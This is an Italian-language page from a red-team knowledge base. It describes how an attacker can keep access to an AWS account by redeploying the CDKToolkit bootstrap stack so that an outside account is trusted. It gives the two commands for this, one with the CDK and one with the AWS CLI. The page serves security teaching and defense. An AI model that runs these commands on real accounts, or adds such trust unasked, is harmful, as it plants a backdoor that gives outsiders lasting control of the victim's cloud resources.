AWS - Cloudformation Persistenza

Tip

Impara & pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Sostieni HackTricks

CloudFormation

Per maggiori informazioni, consulta:

AWS - CloudFormation & Codestar Enum

CDK Bootstrap Stack

L’AWS CDK distribuisce uno stack CFN chiamato CDKToolkit. Questo stack supporta un parametro TrustedAccounts che permette ad account esterni di distribuire progetti CDK nell’account della vittima. Un attaccante può abusarne per concedersi accesso indefinito all’account della vittima, sia usando l’AWS cli per ridistribuire lo stack con parametri, sia l’AWS CDK cli.

# CDK
cdk bootstrap --trust 1234567890

# AWS CLI
aws cloudformation update-stack --use-previous-template --parameters ParameterKey=TrustedAccounts,ParameterValue=1234567890

Tip

Impara & pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Sostieni HackTricks